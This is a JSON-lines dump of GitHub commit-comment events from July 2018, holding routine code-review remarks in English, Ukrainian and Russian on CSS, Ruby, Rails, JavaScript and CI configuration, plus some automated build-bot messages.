{"id":"7981966238","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747199,"position":351,"line":351,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:10:30Z","updated_at":"2018-07-18T10:10:30Z","author_association":"NONE","body":"В даному випадку ці стилі абсолютно нічого не змінюють, вони просто зайві"}},"created_at":"2018-07-18T10:10:30Z"}
{"id":"7981966410","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747200,"position":23,"line":94,"path":"app/models/route.rb","commit_id":"3b32d41d55888b4566c05386c859d8dd99740657","created_at":"2018-07-18T10:10:32Z","updated_at":"2018-07-18T10:10:32Z","author_association":"CONTRIBUTOR","body":"add 's' and set self.updated_at = Time.now.to_s"}},"created_at":"2018-07-18T10:10:32Z"}
{"id":"7981971699","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747218,"position":327,"line":1452,"path":"swagger/0.1/swagger.json","commit_id":"3b32d41d55888b4566c05386c859d8dd99740657","created_at":"2018-07-18T10:11:34Z","updated_at":"2018-07-18T10:11:34Z","author_association":"CONTRIBUTOR","body":"add end line"}},"created_at":"2018-07-18T10:11:34Z"}
{"id":"7981974466","type":"CommitCommentEvent","actor":{"login":"SENya1990"},"repo":{"name":"Acumatica/Acuminator"},"payload":{"comment":{"id":29747222,"position":69,"line":112,"path":"src/Acuminator/Acuminator.Analyzers/Analyzers/DAC/DacDeclarationAnalyzer.cs","commit_id":"9ff4da93875be60288aed9957874039ba1d2fbdd","created_at":"2018-07-18T10:12:08Z","updated_at":"2018-07-18T10:12:08Z","author_association":"CONTRIBUTOR","body":"It's not good - we will eleiminate all dependancy on the platform dll in the future"}},"created_at":"2018-07-18T10:12:08Z"}
{"id":"7981975046","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747224,"position":6,"line":5,"path":"api/db.json","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T10:12:15Z","updated_at":"2018-07-18T10:12:15Z","author_association":"NONE","body":"Ем.... навіщо це зберігати в базі? (loading isFetching)"}},"created_at":"2018-07-18T10:12:15Z"}
{"id":"7981977436","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747229,"position":12,"line":31,"path":"src/action/index.js","commit_id":"db13a8ff055d87ced868aa44a8c2cfb972f8285a","created_at":"2018-07-18T10:12:43Z","updated_at":"2018-07-18T10:12:43Z","author_association":"NONE","body":"Хіба це не одне і те ж поле? Навіщо дублювання?"}},"created_at":"2018-07-18T10:12:43Z"}
{"id":"7981980908","type":"CommitCommentEvent","actor":{"login":"vendethiel"},"repo":{"name":"perl6/nqp"},"payload":{"comment":{"id":29747236,"position":5,"line":181,"path":"src/vm/js/nqp-runtime/sixmodel.js","commit_id":"91c45b291426b2ef852b4df7e5ddde3048018a78","created_at":"2018-07-18T10:13:26Z","updated_at":"2018-07-18T10:13:26Z","author_association":"MEMBER","body":"0n?"}},"created_at":"2018-07-18T10:13:26Z"}
{"id":"7981981142","type":"CommitCommentEvent","actor":{"login":"yeswanth143"},"repo":{"name":"saimanikanta123/sai"},"payload":{"comment":{"id":29747238,"position":null,"line":null,"path":null,"commit_id":"36a16a98164b572ee244cbdc06111da0c4ba8294","created_at":"2018-07-18T10:13:29Z","updated_at":"2018-07-18T10:13:29Z","author_association":"NONE","body":"rey"}},"created_at":"2018-07-18T10:13:29Z"}
{"id":"7981987139","type":"CommitCommentEvent","actor":{"login":"saimanikanta123"},"repo":{"name":"saimanikanta123/sai"},"payload":{"comment":{"id":29747254,"position":null,"line":null,"path":null,"commit_id":"36a16a98164b572ee244cbdc06111da0c4ba8294","created_at":"2018-07-18T10:14:41Z","updated_at":"2018-07-18T10:14:41Z","author_association":"OWNER","body":"hi yeswanth\r\n"}},"created_at":"2018-07-18T10:14:41Z"}
{"id":"7981989910","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747261,"position":372,"line":372,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:15:16Z","updated_at":"2018-07-18T10:15:16Z","author_association":"NONE","body":"https://www.awesomescreenshot.com/image/3494874/4a96ed7735cf2e1fbf4d10b8800be6a1\r\n\r\nНа малих екранах все сумно.\r\n\r\nТреба попроцювати над адаптивністю"}},"created_at":"2018-07-18T10:15:16Z"}
{"id":"7981992572","type":"CommitCommentEvent","actor":{"login":"happybai"},"repo":{"name":"lele88lala/react-lol"},"payload":{"comment":{"id":29747266,"position":17,"line":17,"path":"src/components/MyInfo.js","commit_id":"e419c20344675dfaab97827ef987f738b26adaf4","created_at":"2018-07-18T10:15:47Z","updated_at":"2018-07-18T10:15:47Z","author_association":"NONE","body":"Do not to use hehe."}},"created_at":"2018-07-18T10:15:47Z"}
{"id":"7981995988","type":"CommitCommentEvent","actor":{"login":"edgarswarowski"},"repo":{"name":"mosh-hamedani/vidly-mvc-5"},"payload":{"comment":{"id":29747275,"position":null,"line":null,"path":null,"commit_id":"14e11134a3997f5ed00883856f32dde579137d27","created_at":"2018-07-18T10:16:26Z","updated_at":"2018-07-18T10:16:26Z","author_association":"NONE","body":"Hi everyone,\r\n\r\nHad the same problem as @LeelaRajesh . I was getting status code 500 when submitting the form. My error was that my Rental.cs had the property \"public Movie Movies { get; set; }\" and NewRentalDto had the property \"public List<int> MoviesId { get; set; }\" \r\n\r\nAfter a few days trying to fix this, I've changed the property's names to:\r\nRental.cs - public Movie Movie { get; set; }\r\nNewRentalDto - public List<int> MovieIds { get; set; }\r\n\r\nNow the code is working perfectly.\r\n\r\nHope it helps you too."}},"created_at":"2018-07-18T10:16:26Z"}
{"id":"7981996181","type":"CommitCommentEvent","actor":{"login":"SENya1990"},"repo":{"name":"Acumatica/Acuminator"},"payload":{"comment":{"id":29747276,"position":69,"line":112,"path":"src/Acuminator/Acuminator.Analyzers/Analyzers/DAC/DacDeclarationAnalyzer.cs","commit_id":"9ff4da93875be60288aed9957874039ba1d2fbdd","created_at":"2018-07-18T10:16:29Z","updated_at":"2018-07-18T10:16:29Z","author_association":"CONTRIBUTOR","body":"This constants could be stored as a private static field in diagnostic, or, if there is a possibility to reuse them, in separate class in Acuminator.Utils project."}},"created_at":"2018-07-18T10:16:29Z"}
{"id":"7981998182","type":"CommitCommentEvent","actor":{"login":"lele88lala"},"repo":{"name":"lele88lala/react-lol"},"payload":{"comment":{"id":29747279,"position":17,"line":17,"path":"src/components/MyInfo.js","commit_id":"e419c20344675dfaab97827ef987f738b26adaf4","created_at":"2018-07-18T10:16:53Z","updated_at":"2018-07-18T10:16:53Z","author_association":"OWNER","body":"ok teacher Bai"}},"created_at":"2018-07-18T10:16:53Z"}
{"id":"7981998197","type":"CommitCommentEvent","actor":{"login":"johncowen"},"repo":{"name":"johncowen/iris"},"payload":{"comment":{"id":29747280,"position":12,"line":9,"path":"bin/sassify","commit_id":"b6dcf8a00a91356e4fe72288c912a43a35ff8858","created_at":"2018-07-18T10:16:53Z","updated_at":"2018-07-18T10:16:53Z","author_association":"OWNER","body":"👍 hehe, yeah the script is a little scrappy at the moment, but the idea is it's future proofing it."}},"created_at":"2018-07-18T10:16:53Z"}
{"id":"7981999399","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747283,"position":84,"line":84,"path":"lib/tasks/migrations/201806081805_create_route_for_old_mission.rake","commit_id":"53b61eb2631ce65986f145d98da05e2d14307950","created_at":"2018-07-18T10:17:08Z","updated_at":"2018-07-18T10:17:08Z","author_association":"CONTRIBUTOR","body":"=null where type=mission"}},"created_at":"2018-07-18T10:17:08Z"}
{"id":"7982001993","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747289,"position":67,"line":67,"path":"lib/tasks/migrations/201806081805_create_route_for_old_mission.rake","commit_id":"53b61eb2631ce65986f145d98da05e2d14307950","created_at":"2018-07-18T10:17:39Z","updated_at":"2018-07-18T10:17:39Z","author_association":"CONTRIBUTOR","body":"where route_id = null"}},"created_at":"2018-07-18T10:17:39Z"}
{"id":"7982005508","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29747304,"position":9,"line":15,"path":"Lesson_1/right_triangle.rb","commit_id":"d6e4c917b7f84db009db88872a2079bad44c76e5","created_at":"2018-07-18T10:18:22Z","updated_at":"2018-07-18T10:18:22Z","author_association":"NONE","body":"массивы в руби рекомендуют записывать, разделяя элементы пробелом:\r\n```ruby\r\narr = [1, 2, 3] # good\r\n\r\narr = [1,2,3] # bad"}},"created_at":"2018-07-18T10:18:22Z"}
{"id":"7982007172","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747307,"position":284,"line":284,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:18:42Z","updated_at":"2018-07-18T10:18:42Z","author_association":"NONE","body":"задовгий селектор, теж краще використовувати класи ніж назви тегів.\r\n\r\nБажано виправити це по всьому коду"}},"created_at":"2018-07-18T10:18:42Z"}
{"id":"7982012064","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747323,"position":185,"line":185,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:19:41Z","updated_at":"2018-07-18T10:19:41Z","author_association":"NONE","body":"баго де font-size 14, якщо це основний розмір шрифту на сайті то краще його задати на bodyі перезаписувати тільки в тих місцях де потрібно інший"}},"created_at":"2018-07-18T10:19:41Z"}
{"id":"7982014777","type":"CommitCommentEvent","actor":{"login":"likelion"},"repo":{"name":"EricssonResearch/scott-eu"},"payload":{"comment":{"id":29747328,"position":11,"line":16,"path":".gitlab-ci.yml","commit_id":"da0d3774176293abf1efada61168e371ac2215f5","created_at":"2018-07-18T10:20:14Z","updated_at":"2018-07-18T10:20:14Z","author_association":"CONTRIBUTOR","body":"@berezovskyi \r\n\r\nIf fact we can use `git clone --single-branch -b $CI_COMMIT_REF_NAME https://github.com/EricssonResearch/scott-eu.git`\r\n\r\nThe $CI_COMMIT_REF_NAME is set to the branch name by the CI\r\n\r\nbefore_script is needed in general because there is no automatic sync between github and gitlab"}},"created_at":"2018-07-18T10:20:14Z"}
{"id":"7982022592","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747358,"position":12,"line":79,"path":"src/containers/VisiblePostList.js","commit_id":"23240fe00bfec9bf59e0811f67cc4aa7e0b8ee17","created_at":"2018-07-18T10:21:44Z","updated_at":"2018-07-18T10:21:44Z","author_association":"NONE","body":"posts: state.todos.get(\"posts\").toJS(),\r\nloading: state.todos.get(\"loading\").toJS(),\r\nerror: state.todos.get(\"error\").toJS()"}},"created_at":"2018-07-18T10:21:44Z"}
{"id":"7982023642","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747359,"position":80,"line":80,"path":"lib/tasks/migrations/201806081805_create_route_for_old_mission.rake","commit_id":"53b61eb2631ce65986f145d98da05e2d14307950","created_at":"2018-07-18T10:21:57Z","updated_at":"2018-07-18T10:21:57Z","author_association":"CONTRIBUTOR","body":"archive existing missions Time<J-1 and routes"}},"created_at":"2018-07-18T10:21:57Z"}
{"id":"7982024791","type":"CommitCommentEvent","actor":{"login":"Tra4er"},"repo":{"name":"drenkas/React-Redux-TODO"},"payload":{"comment":{"id":29747363,"position":12,"line":79,"path":"src/containers/VisiblePostList.js","commit_id":"23240fe00bfec9bf59e0811f67cc4aa7e0b8ee17","created_at":"2018-07-18T10:22:11Z","updated_at":"2018-07-18T10:22:11Z","author_association":"NONE","body":"Як варіант. Мені так більше подобається."}},"created_at":"2018-07-18T10:22:11Z"}
{"id":"7982026019","type":"CommitCommentEvent","actor":{"login":"NazarShershen"},"repo":{"name":"Julia-69/PSD-to-HTML"},"payload":{"comment":{"id":29747376,"position":372,"line":372,"path":"style.css","commit_id":"1226edeac51898905829e8208133dca702ffaa08","created_at":"2018-07-18T10:22:25Z","updated_at":"2018-07-18T10:22:25Z","author_association":"NONE","body":"Також @media   стилі можна винести в окремий css файл, щоб це не був дуже великий"}},"created_at":"2018-07-18T10:22:25Z"}
{"id":"7982029265","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29747389,"position":null,"line":null,"path":null,"commit_id":"aa2b41023cab83e14ad9f61b13d09bde57e2cea4","created_at":"2018-07-18T10:23:04Z","updated_at":"2018-07-18T10:23:04Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-18T10:23:04Z"}
{"id":"7982029607","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29747390,"position":17,"line":18,"path":"Lesson_1/right_triangle.rb","commit_id":"d6e4c917b7f84db009db88872a2079bad44c76e5","created_at":"2018-07-18T10:23:09Z","updated_at":"2018-07-18T10:23:09Z","author_association":"NONE","body":"ну в общем-то если решил обращаться напрямую к элементам массива, то зачем здесь вытаскивать в переменную? \r\nлучше как-то однообразно: либо все в перменные, либо обращайся ко всем сторонам, как к элементам массива"}},"created_at":"2018-07-18T10:23:09Z"}
{"id":"7982029755","type":"CommitCommentEvent","actor":{"login":"webhdx"},"repo":{"name":"ezsystems/ezplatform-ee-demo"},"payload":{"comment":{"id":29747391,"position":10,"line":19,"path":"composer.json","commit_id":"37d7711e7a590b0440aa19853c29573dc3685cb0","created_at":"2018-07-18T10:23:11Z","updated_at":"2018-07-18T10:23:11Z","author_association":"CONTRIBUTOR","body":"This cannot go to the repository because it will allow to download FormBuilder directly from GitHub instead of our Satis (=> ignoring authentication check => downloading the source without paying subscription fee). You can use it for the development purposes only."}},"created_at":"2018-07-18T10:23:11Z"}
{"id":"7982032315","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747399,"position":28,"line":274,"path":"SyncFunction/SyncFunction.js","commit_id":"43f40f49724d540de294b9cdb28eb1ce19580464","created_at":"2018-07-18T10:23:40Z","updated_at":"2018-07-18T10:23:40Z","author_association":"CONTRIBUTOR","body":"use another temp channel for missions"}},"created_at":"2018-07-18T10:23:40Z"}
{"id":"7982035413","type":"CommitCommentEvent","actor":{"login":"siggetest"},"repo":{"name":"siggetest/githubtest"},"payload":{"comment":{"id":29747411,"position":null,"line":null,"path":null,"commit_id":"732090f331e4882a5ab94802e599362f94afd450","created_at":"2018-07-18T10:24:17Z","updated_at":"2018-07-18T10:24:17Z","author_association":"OWNER","body":"# Specs execution successful\n:scroll: [View logs](http://bamboo.comnull)\n### Plans updated\n\nBamboo specs have been successfully imported and the following plans have been updated.\n\nProject | Plan | Build\n---|---|---\n[Test](http://bamboo.com/browse/TEST) | [Comment test](http://bamboo.com/browse/TEST-CTEST)  | :white_check_mark: [\\#1](http://bamboo.com/browse/TEST-CTEST-1)\n[New project](http://bamboo.com/browse/NEW) | [Disabled plan](http://bamboo.com/browse/NEW-DISABLED) **disabled** | :white_check_mark: [\\#1](http://bamboo.com/browse/NEW-DISABLED-1)\n\n### Deployments updated\n\nBamboo specs have been successfully imported and the following deployment projects have been updated.\n\n|Deployment project |\n----|\n[Deployment test](http://bamboo.com/deploy/viewDeploymentProjectVersions.action?id=2162689)|\n"}},"created_at":"2018-07-18T10:24:17Z"}
{"id":"7982039359","type":"CommitCommentEvent","actor":{"login":"fab-girard"},"repo":{"name":"Mapotempo/fleet-api"},"payload":{"comment":{"id":29747423,"position":22,"line":22,"path":"app/controllers/api/v01/company_controller.rb","commit_id":"a0c74261a3a22fd94837bda77da2531dc90586d0","created_at":"2018-07-18T10:25:05Z","updated_at":"2018-07-18T10:25:05Z","author_association":"CONTRIBUTOR","body":"use `show` instead of `index` - rename file to companies_controller"}},"created_at":"2018-07-18T10:25:05Z"}
{"id":"7982066878","type":"CommitCommentEvent","actor":{"login":"xj451118937"},"repo":{"name":"xj451118937/Hello-World"},"payload":{"comment":{"id":29747492,"position":null,"line":null,"path":null,"commit_id":"aa583f8877828fe149b01aaf3196c8254cba5698","created_at":"2018-07-18T10:30:41Z","updated_at":"2018-07-18T10:30:41Z","author_association":"OWNER","body":"Hello World"}},"created_at":"2018-07-18T10:30:41Z"}
{"id":"7982080387","type":"CommitCommentEvent","actor":{"login":"Djuliuss"},"repo":{"name":"Djuliuss/Remittance"},"payload":{"comment":{"id":29747521,"position":41,"line":76,"path":"contracts/Remittance.sol","commit_id":"51d066f79cc71928bc9afeb541c818de0c4bd6db","created_at":"2018-07-18T10:33:29Z","updated_at":"2018-07-18T10:33:29Z","author_association":"OWNER","body":"OK, I understand. So in that case, if I shouldn't be using `bytes`, then I cannot use function `kecacc256` in the contract. The exchange will have to provide the password already hashed previously. Is that correct ?"}},"created_at":"2018-07-18T10:33:29Z"}
{"id":"7982080415","type":"CommitCommentEvent","actor":{"login":"jaykrell"},"repo":{"name":"Microsoft/Detours"},"payload":{"comment":{"id":29747522,"position":4,"line":952,"path":"src/creatwth.cpp","commit_id":"24c103797f653f9233f64396138edee7a6f6742c","created_at":"2018-07-18T10:33:29Z","updated_at":"2018-07-18T10:33:29Z","author_association":"NONE","body":"I fixed this stuff generally in another PR or at least in SD... older VC was also not permissive."}},"created_at":"2018-07-18T10:33:29Z"}
{"id":"7982085275","type":"CommitCommentEvent","actor":{"login":"surebart"},"repo":{"name":"octokit/rest.js"},"payload":{"comment":{"id":29747531,"position":4,"line":78,"path":"package.json","commit_id":"3de2f86159af0a339b3436b60bb72f228b4a511a","created_at":"2018-07-18T10:34:27Z","updated_at":"2018-07-18T10:34:27Z","author_association":"NONE","body":"16.1"}},"created_at":"2018-07-18T10:34:27Z"}
{"id":"7982085851","type":"CommitCommentEvent","actor":{"login":"dasyad00"},"repo":{"name":"autokey/autokey"},"payload":{"comment":{"id":29747533,"position":5,"line":5,"path":"debian/changelog","commit_id":"1781fc3191cfc2f886fee0a477b52fd469f1dc41","created_at":"2018-07-18T10:34:35Z","updated_at":"2018-07-18T10:34:35Z","author_association":"NONE","body":"Can you please clarify how you did this?"}},"created_at":"2018-07-18T10:34:35Z"}
{"id":"7982086608","type":"CommitCommentEvent","actor":{"login":"McSimp"},"repo":{"name":"SirWaddles/JohnWick"},"payload":{"comment":{"id":29747534,"position":17,"line":70,"path":"fortnite.js","commit_id":"362213fe2dbaf167d7c00d2400bde794109dcf76","created_at":"2018-07-18T10:34:45Z","updated_at":"2018-07-18T10:34:45Z","author_association":"NONE","body":"wtf is this crap"}},"created_at":"2018-07-18T10:34:45Z"}
{"id":"7982092744","type":"CommitCommentEvent","actor":{"login":"HenriBeck"},"repo":{"name":"gomesalexandre/react-jss"},"payload":{"comment":{"id":29747551,"position":6,"line":9,"path":"src/jss.js","commit_id":"ef4819ae8caf6bef41e72fd41f2695defcd4853c","created_at":"2018-07-18T10:36:00Z","updated_at":"2018-07-18T10:36:00Z","author_association":"NONE","body":"No, this will break in the next version of Jss. Duplicating it, for now, might be the best option."}},"created_at":"2018-07-18T10:36:00Z"}
{"id":"7982094434","type":"CommitCommentEvent","actor":{"login":"Sanduhr32"},"repo":{"name":"DuncteBot/SkyBot"},"payload":{"comment":{"id":29747555,"position":5,"line":102,"path":"src/main/java/ml/duncte123/skybot/SkyBot.java","commit_id":"2705b03499a707b3b96e3746352815f999d2a604","created_at":"2018-07-18T10:36:21Z","updated_at":"2018-07-18T10:36:21Z","author_association":"MEMBER","body":"Fuck intellij. I always uncheck this file."}},"created_at":"2018-07-18T10:36:21Z"}
{"id":"7982096249","type":"CommitCommentEvent","actor":{"login":"XbimCI"},"repo":{"name":"xBimTeam/XbimGeometry"},"payload":{"comment":{"id":29747559,"position":null,"line":null,"path":null,"commit_id":"5d3e247fcbfe33566c6987fe20fae5f36a1cbe9f","created_at":"2018-07-18T10:36:45Z","updated_at":"2018-07-18T10:36:45Z","author_association":"NONE","body":"TeamCity Xbim :: Xbim Geometry :: XbimGeometry [Build 517](http://xbimbuilds.cloudapp.net/viewLog.html?buildId=1928&buildTypeId=Xbim_XbimGeometry_XbimGeometry) is now running\n"}},"created_at":"2018-07-18T10:36:45Z"}
{"id":"7982097959","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29747563,"position":35,"line":30,"path":"Lesson_1/right_triangle.rb","commit_id":"d6e4c917b7f84db009db88872a2079bad44c76e5","created_at":"2018-07-18T10:37:09Z","updated_at":"2018-07-18T10:37:09Z","author_association":"NONE","body":"я не обратил внимания в прошлый раз... у тебя табы исползуются для отступа (по крайней мере в этом блоке)\r\nпоэтому такая просьба\r\nздесь и далее везде:\r\nнастрой редактор на отступ ровно в 2 проблела, именно так принято в ruby\r\nпричем, именно пробела, а не таба, т.е. должна быть замена табов на пробелы, т.н. soft tabs\r\nнайди в интернете как сделать soft tabs для твоего редактора"}},"created_at":"2018-07-18T10:37:09Z"}
{"id":"7982099256","type":"CommitCommentEvent","actor":{"login":"ThomasAbballe"},"repo":{"name":"Alneos/vega"},"payload":{"comment":{"id":29747567,"position":null,"line":null,"path":null,"commit_id":"5691b71f9df083c6d646d32c4227ed901354b8bc","created_at":"2018-07-18T10:37:26Z","updated_at":"2018-07-18T10:37:26Z","author_association":"COLLABORATOR","body":"Ah yes, this dispatch of PARAM was long overdue, thks ! \r\n\r\nTwo comments however: \r\n - Many key exists as \"bulk command\" and \"option\". Modetrack, for example, if my memory serve. Name of functions should be parseParamKey, and not parseKey, to avoid the confusion.\r\n - Do the comments respect the Doxygen syntax? I know that /** lore ipsum */ over a declaration work. I don't know the syntax for comments in .cpp. "}},"created_at":"2018-07-18T10:37:26Z"}
{"id":"7982099684","type":"CommitCommentEvent","actor":{"login":"johncowen"},"repo":{"name":"johncowen/iris"},"payload":{"comment":{"id":29747574,"position":26,"line":26,"path":"color/system-variables.css","commit_id":"b6dcf8a00a91356e4fe72288c912a43a35ff8858","created_at":"2018-07-18T10:37:32Z","updated_at":"2018-07-18T10:37:32Z","author_association":"OWNER","body":"See above comment on this stuff.\r\n\r\nAlso, I was gonna add a bunch of keyline properties, but backed out for the moment I'm not sure if we need to go that far, I think I have like 4 different keyline colors.\r\n\r\nOne thing I've noticed is that 'boxes' are sometimes a 'thing' so a certain grey border color will go with a specific background color was thinking of maybe making a set of color only 'boxes'\r\n\r\n```\r\n%box-color-100 {\r\n  background-color: var(--ui-white);\r\n  border-color: var(--ui-gray-400);\r\n}\r\n%box-color-200 {\r\n  background-color: var(--ui-white);\r\n  border-color: var(--ui-gray-600)\r\n}\r\n%box-color-300 {\r\n  background-color: var(--ui-gray-200);\r\n  border-color: var(--ui-gray-400);\r\n  color: var(--ui-gray-900);\r\n}\r\n%box-color-400 {\r\n  background-color: var(--ui-gray-400);\r\n  border-color: var(--ui-gray-700);\r\n  color: var(--ui-gray-900);\r\n}\r\n```\r\n\r\nBorder thicknesses would be set separately incase you don't want them, or you only want them on the to por bottom\r\n\r\n```\r\nheader {\r\n  @extend %box-color-400;\r\n  border-bottom: $decor-border-100;\r\n}\r\nsection {\r\n  @extend %box-color-400;\r\n  border-top: $decor-border-100;\r\n}\r\n```\r\n\r\n...little bit further ahead that, but its a possible.\r\n\r\n\r\n\r\n\r\n"}},"created_at":"2018-07-18T10:37:32Z"}
{"id":"7982100739","type":"CommitCommentEvent","actor":{"login":"joka"},"repo":{"name":"novareto/uvc.unfallanzeige"},"payload":{"comment":{"id":29747585,"position":18,"line":23,"path":"uvc/unfallanzeige/templates/basic.cpt","commit_id":"96a53bb3925db2da34ed1a24399e46f64e862433","created_at":"2018-07-18T10:37:45Z","updated_at":"2018-07-18T10:37:45Z","author_association":"CONTRIBUTOR","body":"This change brakes the basic step template:\r\n\r\n1. String literal is not closed in expression:  widget2 W.get('form.basic.field.unfunr)\"\r\n2. macro 'doublefield' is not defined"}},"created_at":"2018-07-18T10:37:45Z"}
{"id":"7982108442","type":"CommitCommentEvent","actor":{"login":"geek-soft"},"repo":{"name":"hmcts/cmc-claim-store"},"payload":{"comment":{"id":29747606,"position":5,"line":11,"path":"src/main/resources/db/migration/claimstore/V2018_07_16_1318__Update_response_payment_option_for_full_by_set_date.sql","commit_id":"1b2cf3bde0c116c69793ec0644ed84ba633dc524","created_at":"2018-07-18T10:39:22Z","updated_at":"2018-07-18T10:39:22Z","author_association":"CONTRIBUTOR","body":"Please revert"}},"created_at":"2018-07-18T10:39:22Z"}
{"id":"7982109624","type":"CommitCommentEvent","actor":{"login":"narspt"},"repo":{"name":"juribeparada/MMDVM_HS"},"payload":{"comment":{"id":29747613,"position":null,"line":null,"path":null,"commit_id":"46ba5cc4f74d072aa545fd54fc5b64bb473e65bd","created_at":"2018-07-18T10:39:37Z","updated_at":"2018-07-18T10:39:37Z","author_association":"NONE","body":"Many thanks, I will just try the firmware with your last changes and will let you know something soon.\r\n\r\nYet concerning audio not recovering I was experiencing, please note that I couldn't also reproduce it all times just randomly it would happen or not, I could reproduce it a few times also intentionally by interfering with tx of a 2nd radio (actually it was a dmr one) on a close freq. (not on the same), it would make rssi go down and cause transmission lost, also duration of the interfering signal did seem very important to make it be able to recover or not. Anyway I will just test with your firmware changes and see if I still can reproduce it."}},"created_at":"2018-07-18T10:39:37Z"}
{"id":"7982110592","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29747618,"position":18,"line":16,"path":"Lesson_1/quadratic_equation.rb","commit_id":"d6e4c917b7f84db009db88872a2079bad44c76e5","created_at":"2018-07-18T10:39:48Z","updated_at":"2018-07-18T10:39:48Z","author_association":"NONE","body":"при отрицательном дискриминанте в этой строке программа вылетит с ошибкой\r\nкорень нужно вычислять только при положительном дискриминанте\r\n(к тому же зачем утруждаться этой операцией, если он <= 0 - он в этих ветках вообще не нужен)"}},"created_at":"2018-07-18T10:39:48Z"}
{"id":"7982113914","type":"CommitCommentEvent","actor":{"login":"AbumattarSA"},"repo":{"name":"AbumattarSA/SaaS-App"},"payload":{"comment":{"id":29747633,"position":null,"line":null,"path":null,"commit_id":"ab31646cc9aa1f1451483ec77c922dc2c4aaaf21","created_at":"2018-07-18T10:40:31Z","updated_at":"2018-07-18T10:40:31Z","author_association":"OWNER","body":"This commit also includes the installation of Node.js."}},"created_at":"2018-07-18T10:40:31Z"}
{"id":"7982115065","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29747637,"position":15,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"d6e4c917b7f84db009db88872a2079bad44c76e5","created_at":"2018-07-18T10:40:45Z","updated_at":"2018-07-18T10:40:45Z","author_association":"NONE","body":"про именование переменных уже писал в прошлый раз, копирую:\r\n\r\n> в руби приняты следующие правила именования:\r\n> - имена методов и переменных записываются в стиле `snake_case` (также именуют и файлы)\r\n> - константы записываются или `CamelCase` (обычно это имена классов и модулей), или `UPPER_SNAKE_CASE` (константы, объявляемые в классах почти всегда пишут именно так)"}},"created_at":"2018-07-18T10:40:45Z"}
{"id":"7982120821","type":"CommitCommentEvent","actor":{"login":"mr-koww"},"repo":{"name":"k-gavrilov/ruby_basic"},"payload":{"comment":{"id":29747645,"position":11,"line":11,"path":"lesson1/ideal_weight.rb","commit_id":"df17da593b54221b38b06fd2102823b40c005985","created_at":"2018-07-18T10:41:57Z","updated_at":"2018-07-18T10:41:57Z","author_association":"NONE","body":"height - 110 вычисляется дважды, оптимальней посчитать и занести в переменную, а затем использовать ее"}},"created_at":"2018-07-18T10:41:57Z"}
{"id":"7982122263","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"kmaksimovv/thinknetica"},"payload":{"comment":{"id":29747650,"position":15,"line":13,"path":"Lesson_1/quadratic_equation.rb","commit_id":"d6e4c917b7f84db009db88872a2079bad44c76e5","created_at":"2018-07-18T10:42:15Z","updated_at":"2018-07-18T10:42:15Z","author_association":"NONE","body":"это я намекаю, что имя `D` не самое удачное, лучше с маленькой буквы, можно даже целое слово, а не одна буква, но это на твое усмотрение )"}},"created_at":"2018-07-18T10:42:15Z"}
